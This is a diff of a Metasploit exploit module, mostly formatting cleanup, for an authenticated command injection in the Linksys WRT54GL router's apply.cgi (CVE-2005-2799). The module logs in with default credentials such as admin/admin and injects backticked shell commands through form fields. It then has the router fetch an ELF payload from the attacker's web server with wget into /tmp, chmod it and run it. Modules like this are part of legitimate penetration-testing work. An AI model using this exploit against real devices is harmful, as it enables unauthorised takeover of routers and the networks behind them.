@@ -12,55 +12,61 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'	=> 'Linksys WRT54GL apply.cgi Command Execution',
-      'Description' => %q{
+    super(
+      update_info(
+        info,
+        'Name'	=> 'Linksys WRT54GL apply.cgi Command Execution',
+        'Description' => %q{
           Some Linksys Routers are vulnerable to an authenticated OS command injection in
-        the Web Interface. Default credentials are admin/admin or admin/password. Since it
-        is a blind os command injection vulnerability, there is no output for the executed
-        command when using the cmd generic payload. A ping command against a controlled
-        system could be used for testing purposes. The user must be prudent when using this
-        module since it modifies the router configuration while exploitation, even when it
-        tries to restore previous values.
-      },
-      'Author'      =>
-        [
+          the Web Interface. Default credentials are admin/admin or admin/password. Since it
+          is a blind os command injection vulnerability, there is no output for the executed
+          command when using the cmd generic payload. A ping command against a controlled
+          system could be used for testing purposes. The user must be prudent when using this
+          module since it modifies the router configuration while exploitation, even when it
+          tries to restore previous values.
+        },
+        'Author' => [
           'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery and Metasploit module
           'juan vazquez' # minor help with msf module
         ],
-      'License'     => MSF_LICENSE,
-      'References'  =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'CVE', '2005-2799' ],
           [ 'OSVDB', '89912' ],
           [ 'BID', '57459' ],
           [ 'EDB', '24202' ],
           [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-001' ]
         ],
-      'DisclosureDate' => '2013-01-18',
-      'Privileged'     => true,
-      'Platform'       => %w{ linux unix },
-      'Payload'	=>
-        {
+        'DisclosureDate' => '2013-01-18',
+        'Privileged' => true,
+        'Platform' => %w{linux unix},
+        'Payload' => {
           'DisableNops' => true
         },
-      'Targets'	=>
-        [
-          [ 'CMD',
+        'Targets' => [
+          [
+            'CMD',
             {
-            'Arch' => ARCH_CMD,
-            'Platform' => 'unix'
+              'Arch' => ARCH_CMD,
+              'Platform' => 'unix'
             }
           ],
-          [ 'Linux mipsel Payload',
+          [
+            'Linux mipsel Payload',
             {
-            'Arch' => ARCH_MIPSLE,
-            'Platform' => 'linux'
+              'Arch' => ARCH_MIPSLE,
+              'Platform' => 'linux'
             }
           ],
         ],
-      'DefaultTarget'  => 1
-      ))
+        'DefaultTarget' => 1,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options(
       [
@@ -70,24 +76,25 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
         OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]),
         OptBool.new('RESTORE_CONF', [ true, 'Should we try to restore the original configuration', true ])
-      ])
+      ]
+    )
   end
 
-
   def get_config(config, pattern)
     if config =~ /#{pattern}/
       return $1
     end
+
     return ""
   end
 
-  def grab_config(user,pass)
+  def grab_config(user, pass)
     print_status("#{rhost}:#{rport} - Trying to download the original configuration")
     begin
       res = send_request_cgi({
-        'uri'     => '/index.asp',
-        'method'  => 'GET',
-        'authorization' => basic_auth(user,pass)
+        'uri' => '/index.asp',
+        'method' => 'GET',
+        'authorization' => basic_auth(user, pass)
       })
       if res.nil? or res.code == 404
         fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
@@ -105,7 +112,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server")
     end
 
-    #now_proto and wan_proto should be the same and it should be dhcp! Nothing else tested!
+    # now_proto and wan_proto should be the same and it should be dhcp! Nothing else tested!
     @now_proto_orig = get_config(res.body, "<input\ type=hidden\ name=now_proto\ value=\'(.*)\'>")
     if @now_proto_orig !~ /dhcp/
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Configuration not recognized, aborting to avoid breaking the device")
@@ -158,29 +165,29 @@ class MetasploitModule < Msf::Exploit::Remote
     @wan_wins_3_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,254\,\"WINS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_wins_3\"\ class=num>")
   end
 
-  def restore_conf(user,pass,uri)
+  def restore_conf(user, pass, uri)
     # we have used most parts of the original configuration
     # just need to restore wan_hostname
     cmd = @wan_hostname_orig.to_s
     print_status("#{rhost}:#{rport} - Asking the Linksys device to reload original configuration")
 
-    res = request(cmd,user,pass,uri)
+    res = request(cmd, user, pass, uri)
 
     if (!res)
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to reload original configuration")
     end
 
-    #the device needs around 10 seconds to apply our current configuration
+    # the device needs around 10 seconds to apply our current configuration
     print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")
     select(nil, nil, nil, @timeout)
   end
 
-  def request(cmd,user,pass,uri)
+  def request(cmd, user, pass, uri)
     begin
       res = send_request_cgi({
-        'uri'    => uri,
+        'uri' => uri,
         'method' => 'POST',
-        'authorization' => basic_auth(user,pass),
+        'authorization' => basic_auth(user, pass),
         'encode_params' => false,
         'vars_post' => {
           'submit_button' => "index",
@@ -227,20 +234,19 @@ class MetasploitModule < Msf::Exploit::Remote
           'wan_wins_1' => @wan_wins_1_orig.to_s,
           'wan_wins_2' => @wan_wins_2_orig.to_s,
           'wan_wins_3' => @wan_wins_3_orig.to_s,
-          'time_zone' => "-08+1+1",		#default is ok
-          '_daylight_time' => '1'			#default is ok
-          }
-        })
+          'time_zone' => "-08+1+1",	# default is ok
+          '_daylight_time' => '1'	# default is ok
+        }
+      })
       return res
     rescue ::Rex::ConnectionError
       vprint_error("#{rhost} - Failed to connect to the web server")
       return nil
     end
-
   end
 
   def exploit
-    downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
+    downfile = datastore['DOWNFILE'] || rand_text_alpha(8 + rand(8))
     uri = '/apply.cgi'
     user = datastore['HttpUsername']
     pass = datastore['HttpPassword']
@@ -255,9 +261,9 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
     begin
       res = send_request_cgi({
-        'uri'     => uri,
-        'method'  => 'GET',
-        'authorization' => basic_auth(user,pass)
+        'uri' => uri,
+        'method' => 'GET',
+        'authorization' => basic_auth(user, pass)
       })
       if res.nil? or res.code == 404
         fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
@@ -271,8 +277,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server")
     end
 
-
-    grab_config(user,pass)
+    grab_config(user, pass)
 
     if target.name =~ /CMD/
       if not (datastore['CMD'])
@@ -280,7 +285,7 @@ class MetasploitModule < Msf::Exploit::Remote
       end
       cmd = payload.encoded
       cmd = "`#{cmd}`"
-      res = request(cmd,user,pass,uri)
+      res = request(cmd, user, pass, uri)
       if (!res)
         fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
       else
@@ -288,11 +293,11 @@ class MetasploitModule < Msf::Exploit::Remote
       end
       print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")
       select(nil, nil, nil, @timeout)
-      restore_conf(user,pass,uri) if restore
+      restore_conf(user, pass, uri) if restore
       return
     end
 
-    #thx to Juan for his awesome work on the mipsel elf support
+    # thx to Juan for his awesome work on the mipsel elf support
     @pl = generate_payload_exe
     @elf_sent = false
 
@@ -304,14 +309,9 @@ class MetasploitModule < Msf::Exploit::Remote
     if (datastore['DOWNHOST'])
       service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
     else
-      #do not use SSL
-      if datastore['SSL']
-        ssl_restore = true
-        datastore['SSL'] = false
-      end
 
-      #we use SRVHOST as download IP for the coming wget command.
-      #SRVHOST needs a real IP address of our download host
+      # we use SRVHOST as download IP for the coming wget command.
+      # SRVHOST needs a real IP address of our download host
       if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
         srv_host = Rex::Socket.source_address(rhost)
       else
@@ -320,34 +320,36 @@ class MetasploitModule < Msf::Exploit::Remote
 
       service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
       print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
-      start_service({'Uri' => {
-        'Proc' => Proc.new { |cli, req|
-          on_request_uri(cli, req)
+      start_service({
+        'Uri' => {
+          'Proc' => Proc.new { |cli, req|
+            on_request_uri(cli, req)
+          },
+          'Path' => resource_uri
         },
-        'Path' => resource_uri
-      }})
+        'ssl' => false # do not use SSL
+      })
 
-      datastore['SSL'] = true if ssl_restore
     end
 
     #
     # download payload
     #
     print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}")
-    #this filename is used to store the payload on the device
+    # this filename is used to store the payload on the device
     filename = rand_text_alpha_lower(8)
 
-    #not working if we send all command together -> lets take three requests
+    # not working if we send all command together -> lets take three requests
     cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
     cmd = "`#{cmd}`"
-    res = request(cmd,user,pass,uri)
+    res = request(cmd, user, pass, uri)
     if (!res)
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
     end
 
     # wait for payload download
     if (datastore['DOWNHOST'])
-      #waiting some time so we could be sure that the device got the payload from our third party server
+      # waiting some time so we could be sure that the device got the payload from our third party server
       print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the Linksys device to download the payload")
       select(nil, nil, nil, datastore['HTTP_DELAY'])
     else
@@ -361,7 +363,7 @@ class MetasploitModule < Msf::Exploit::Remote
     cmd = "chmod 777 /tmp/#{filename}"
     cmd = "`#{cmd}`"
     print_status("#{rhost}:#{rport} - Asking the Linksys device to chmod #{downfile}")
-    res = request(cmd,user,pass,uri)
+    res = request(cmd, user, pass, uri)
     if (!res)
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
     end
@@ -374,7 +376,7 @@ class MetasploitModule < Msf::Exploit::Remote
     cmd = "/tmp/#{filename}"
     cmd = "`#{cmd}`"
     print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}")
-    res = request(cmd,user,pass,uri)
+    res = request(cmd, user, pass, uri)
     if (!res)
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
     end
@@ -382,16 +384,16 @@ class MetasploitModule < Msf::Exploit::Remote
     select(nil, nil, nil, @timeout)
 
     #
-    #reload original configuration
+    # reload original configuration
     #
     if restore
-      restore_conf(user,pass,uri)
+      restore_conf(user, pass, uri)
     end
   end
 
   # Handle incoming requests from the server
   def on_request_uri(cli, request)
-    #print_status("on_request_uri called: #{request.inspect}")
+    # print_status("on_request_uri called: #{request.inspect}")
     if (not @pl)
       print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
       return
